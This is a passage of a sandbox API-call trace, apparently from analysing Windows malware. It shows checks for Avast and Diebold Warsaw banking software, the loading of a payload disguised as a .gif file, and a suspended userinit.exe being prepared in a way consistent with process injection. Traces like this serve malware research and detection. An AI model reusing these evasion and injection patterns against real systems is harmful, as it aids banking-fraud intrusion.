EFlags=0x200, Esp=0x18fc98, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0137.283] ResumeThread (hThread=0x110) returned 0x1
[0137.283] VirtualFree (lpAddress=0x9d0000, dwSize=0x0, dwFreeType=0x8000) returned 1
[0137.283] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0137.283] GlobalUnlock (hMem=0x95000c) returned 0
[0137.283] GlobalHandle (pMem=0x33d8b0) returned 0x950004
[0137.283] GlobalUnlock (hMem=0x950004) returned 0
[0137.290] Sleep (dwMilliseconds=0xe74e)
[0147.304] FindWindowA (lpClassName=0x0, lpWindowName="marxvxinhhm0131") returned 0x0
[0147.304] FindFirstFileA (in: lpFileName="C:\\Program Files\\AVAST Software\\Avast\\aswRunDll.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0147.305] FindFirstFileA (in: lpFileName="C:\\Program Files\\Diebold\\Warsaw\\unins000.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0147.305] FindFirstFileA (in: lpFileName="C:\\Windows\\SysWOW64\\userinit.exe", lpFindFileData=0x12e580 | out: lpFindFileData=0x12e580) returned 0xffffffff
[0147.305] CreateFileA (lpFileName="C:\\ProgramData\\tempa\\marxvxinhhmgx.gif" (normalized: "c:\\programdata\\tempa\\marxvxinhhmgx.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118
[0147.305] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e678*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e678*=0) returned 0x0
[0147.305] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0147.305] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x5e000
[0147.305] SetFilePointer (in: hFile=0x118, lDistanceToMove=0, lpDistanceToMoveHigh=0x12e670*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12e670*=0) returned 0x0
[0147.307] GlobalLock (hMem=0x950004) returned 0x33d8b0
[0147.307] ReadFile (in: hFile=0x118, lpBuffer=0x33d8b0, nNumberOfBytesToRead=0x5e000, lpNumberOfBytesRead=0x12e68c, lpOverlapped=0x0 | out: lpBuffer=0x33d8b0*, lpNumberOfBytesRead=0x12e68c*=0x5e000, lpOverlapped=0x0) returned 1
[0147.315] CloseHandle (hObject=0x118) returned 1
[0147.315] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.316] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.316] GlobalUnlock (hMem=0x95000c) returned 0
[0147.316] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4000, uFlags=0x2) returned 0x95000c
[0147.316] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.317] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.317] GlobalUnlock (hMem=0x95000c) returned 0
[0147.317] GlobalReAlloc (hMem=0x95000c, dwBytes=0x6000, uFlags=0x2) returned 0x95000c
[0147.318] GlobalLock (hMem=0x95000c) returned 0x39f8d0
[0147.319] GlobalHandle (pMem=0x39f8d0) returned 0x95000c
[0147.319] GlobalUnlock (hMem=0x95000c) returned 0
[0147.319] GlobalReAlloc (hMem=0x95000c, dwBytes=0x8000, uFlags=0x2) returned 0x95000c
[0147.320] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0147.321] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0147.321] GlobalUnlock (hMem=0x95000c) returned 0
[0147.321] GlobalReAlloc (hMem=0x95000c, dwBytes=0xa000, uFlags=0x2) returned 0x95000c
[0147.321] GlobalLock (hMem=0x95000c) returned 0x3a58e0
[0147.322] GlobalHandle (pMem=0x3a58e0) returned 0x95000c
[0147.322] GlobalUnlock (hMem=0x95000c) returned 0
[0147.322] GlobalReAlloc (hMem=0x95000c, dwBytes=0xc000, uFlags=0x2) returned 0x95000c
[0147.323] GlobalLock (hMem=0x95000c) returned 0x3af8f0
[0147.323] GlobalHandle (pMem=0x3af8f0) returned 0x95000c
[0147.323] GlobalUnlock (hMem=0x95000c) returned 0
[0147.324] GlobalReAlloc (hMem=0x95000c, dwBytes=0xe000, uFlags=0x2) returned 0x95000c
[0147.324] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.325] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.325] GlobalUnlock (hMem=0x95000c) returned 0
[0147.325] GlobalReAlloc (hMem=0x95000c, dwBytes=0x10000, uFlags=0x2) returned 0x95000c
[0147.326] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.327] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.327] GlobalUnlock (hMem=0x95000c) returned 0
[0147.327] GlobalReAlloc (hMem=0x95000c, dwBytes=0x12000, uFlags=0x2) returned 0x95000c
[0147.327] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.328] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.328] GlobalUnlock (hMem=0x95000c) returned 0
[0147.328] GlobalReAlloc (hMem=0x95000c, dwBytes=0x14000, uFlags=0x2) returned 0x95000c
[0147.328] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.329] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.329] GlobalUnlock (hMem=0x95000c) returned 0
[0147.329] GlobalReAlloc (hMem=0x95000c, dwBytes=0x16000, uFlags=0x2) returned 0x95000c
[0147.329] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.330] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.330] GlobalUnlock (hMem=0x95000c) returned 0
[0147.330] GlobalReAlloc (hMem=0x95000c, dwBytes=0x18000, uFlags=0x2) returned 0x95000c
[0147.330] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.331] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.331] GlobalUnlock (hMem=0x95000c) returned 0
[0147.331] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1a000, uFlags=0x2) returned 0x95000c
[0147.331] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.332] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.332] GlobalUnlock (hMem=0x95000c) returned 0
[0147.332] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1c000, uFlags=0x2) returned 0x95000c
[0147.332] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.333] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.333] GlobalUnlock (hMem=0x95000c) returned 0
[0147.333] GlobalReAlloc (hMem=0x95000c, dwBytes=0x1e000, uFlags=0x2) returned 0x95000c
[0147.333] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.334] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.334] GlobalUnlock (hMem=0x95000c) returned 0
[0147.334] GlobalReAlloc (hMem=0x95000c, dwBytes=0x20000, uFlags=0x2) returned 0x95000c
[0147.334] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.336] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.336] GlobalUnlock (hMem=0x95000c) returned 0
[0147.336] GlobalReAlloc (hMem=0x95000c, dwBytes=0x22000, uFlags=0x2) returned 0x95000c
[0147.338] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0147.339] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0147.339] GlobalUnlock (hMem=0x95000c) returned 0
[0147.339] GlobalReAlloc (hMem=0x95000c, dwBytes=0x24000, uFlags=0x2) returned 0x95000c
[0147.339] GlobalLock (hMem=0x95000c) returned 0x3bb8d0
[0147.340] GlobalHandle (pMem=0x3bb8d0) returned 0x95000c
[0147.340] GlobalUnlock (hMem=0x95000c) returned 0
[0147.340] GlobalReAlloc (hMem=0x95000c, dwBytes=0x26000, uFlags=0x2) returned 0x95000c
[0147.343] GlobalLock (hMem=0x95000c) returned 0x3df8e0
[0147.344] GlobalHandle (pMem=0x3df8e0) returned 0x95000c
[0147.344] GlobalUnlock (hMem=0x95000c) returned 0
[0147.344] GlobalReAlloc (hMem=0x95000c, dwBytes=0x28000, uFlags=0x2) returned 0x95000c
[0147.344] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.345] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.345] GlobalUnlock (hMem=0x95000c) returned 0
[0147.345] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2a000, uFlags=0x2) returned 0x95000c
[0147.345] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.346] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.346] GlobalUnlock (hMem=0x95000c) returned 0
[0147.346] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2c000, uFlags=0x2) returned 0x95000c
[0147.346] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.346] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.347] GlobalUnlock (hMem=0x95000c) returned 0
[0147.347] GlobalReAlloc (hMem=0x95000c, dwBytes=0x2e000, uFlags=0x2) returned 0x95000c
[0147.347] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.347] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.347] GlobalUnlock (hMem=0x95000c) returned 0
[0147.347] GlobalReAlloc (hMem=0x95000c, dwBytes=0x30000, uFlags=0x2) returned 0x95000c
[0147.348] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.348] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.348] GlobalUnlock (hMem=0x95000c) returned 0
[0147.348] GlobalReAlloc (hMem=0x95000c, dwBytes=0x32000, uFlags=0x2) returned 0x95000c
[0147.348] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.349] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.349] GlobalUnlock (hMem=0x95000c) returned 0
[0147.349] GlobalReAlloc (hMem=0x95000c, dwBytes=0x34000, uFlags=0x2) returned 0x95000c
[0147.349] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.350] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.350] GlobalUnlock (hMem=0x95000c) returned 0
[0147.350] GlobalReAlloc (hMem=0x95000c, dwBytes=0x36000, uFlags=0x2) returned 0x95000c
[0147.350] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.352] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.352] GlobalUnlock (hMem=0x95000c) returned 0
[0147.352] GlobalReAlloc (hMem=0x95000c, dwBytes=0x38000, uFlags=0x2) returned 0x95000c
[0147.352] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.353] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.353] GlobalUnlock (hMem=0x95000c) returned 0
[0147.353] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3a000, uFlags=0x2) returned 0x95000c
[0147.353] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.354] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.354] GlobalUnlock (hMem=0x95000c) returned 0
[0147.354] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3c000, uFlags=0x2) returned 0x95000c
[0147.354] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.355] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.355] GlobalUnlock (hMem=0x95000c) returned 0
[0147.355] GlobalReAlloc (hMem=0x95000c, dwBytes=0x3e000, uFlags=0x2) returned 0x95000c
[0147.355] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.356] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.356] GlobalUnlock (hMem=0x95000c) returned 0
[0147.356] GlobalReAlloc (hMem=0x95000c, dwBytes=0x40000, uFlags=0x2) returned 0x95000c
[0147.356] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.357] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.357] GlobalUnlock (hMem=0x95000c) returned 0
[0147.357] GlobalReAlloc (hMem=0x95000c, dwBytes=0x42000, uFlags=0x2) returned 0x95000c
[0147.357] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.358] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.358] GlobalUnlock (hMem=0x95000c) returned 0
[0147.358] GlobalReAlloc (hMem=0x95000c, dwBytes=0x44000, uFlags=0x2) returned 0x95000c
[0147.358] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.359] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.359] GlobalUnlock (hMem=0x95000c) returned 0
[0147.359] GlobalReAlloc (hMem=0x95000c, dwBytes=0x46000, uFlags=0x2) returned 0x95000c
[0147.359] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.360] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.360] GlobalUnlock (hMem=0x95000c) returned 0
[0147.360] GlobalReAlloc (hMem=0x95000c, dwBytes=0x48000, uFlags=0x2) returned 0x95000c
[0147.360] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.361] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.361] GlobalUnlock (hMem=0x95000c) returned 0
[0147.361] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4a000, uFlags=0x2) returned 0x95000c
[0147.361] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.362] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.362] GlobalUnlock (hMem=0x95000c) returned 0
[0147.362] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4c000, uFlags=0x2) returned 0x95000c
[0147.362] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.362] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.363] GlobalUnlock (hMem=0x95000c) returned 0
[0147.363] GlobalReAlloc (hMem=0x95000c, dwBytes=0x4e000, uFlags=0x2) returned 0x95000c
[0147.363] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.363] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.363] GlobalUnlock (hMem=0x95000c) returned 0
[0147.363] GlobalReAlloc (hMem=0x95000c, dwBytes=0x50000, uFlags=0x2) returned 0x95000c
[0147.363] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.364] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.364] GlobalUnlock (hMem=0x95000c) returned 0
[0147.364] GlobalReAlloc (hMem=0x95000c, dwBytes=0x52000, uFlags=0x2) returned 0x95000c
[0147.364] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.365] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.365] GlobalUnlock (hMem=0x95000c) returned 0
[0147.365] GlobalReAlloc (hMem=0x95000c, dwBytes=0x54000, uFlags=0x2) returned 0x95000c
[0147.365] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.366] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.366] GlobalUnlock (hMem=0x95000c) returned 0
[0147.366] GlobalReAlloc (hMem=0x95000c, dwBytes=0x56000, uFlags=0x2) returned 0x95000c
[0147.366] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.367] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.367] GlobalUnlock (hMem=0x95000c) returned 0
[0147.367] GlobalReAlloc (hMem=0x95000c, dwBytes=0x58000, uFlags=0x2) returned 0x95000c
[0147.367] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.368] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.368] GlobalUnlock (hMem=0x95000c) returned 0
[0147.368] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5a000, uFlags=0x2) returned 0x95000c
[0147.368] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.369] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.369] GlobalUnlock (hMem=0x95000c) returned 0
[0147.369] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5c000, uFlags=0x2) returned 0x95000c
[0147.369] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.370] GlobalHandle (pMem=0x39b8c0) returned 0x95000c
[0147.370] GlobalUnlock (hMem=0x95000c) returned 0
[0147.370] GlobalReAlloc (hMem=0x95000c, dwBytes=0x5e000, uFlags=0x2) returned 0x95000c
[0147.370] GlobalLock (hMem=0x95000c) returned 0x39b8c0
[0147.371] CreateProcessA (in: lpApplicationName="C:\\Windows\\System32\\userinit.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x580c20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x580c10 | out: lpCommandLine="", lpProcessInformation=0x580c10*(hProcess=0x114, hThread=0x118, dwProcessId=0x180, dwThreadId=0x480)) returned 1
[0147.375] VirtualAlloc (lpAddress=0x0, dwSize=0xd0, flAllocationType=0x1000, flProtect=0x4) returned 0x9d0000
[0147.375] GetThreadContext (in: hThread=0x118, lpContext=0x9d0000 | out: lpContext=0x9d0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffdf000, Edx=0x0, Ecx=0x0, Eax=0x442be9, Ebp=0x0, Eip=0x76f67098, SegCs=0x1b, EFlags=0x200, Esp=0x16ff90, SegSs=0x23, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, 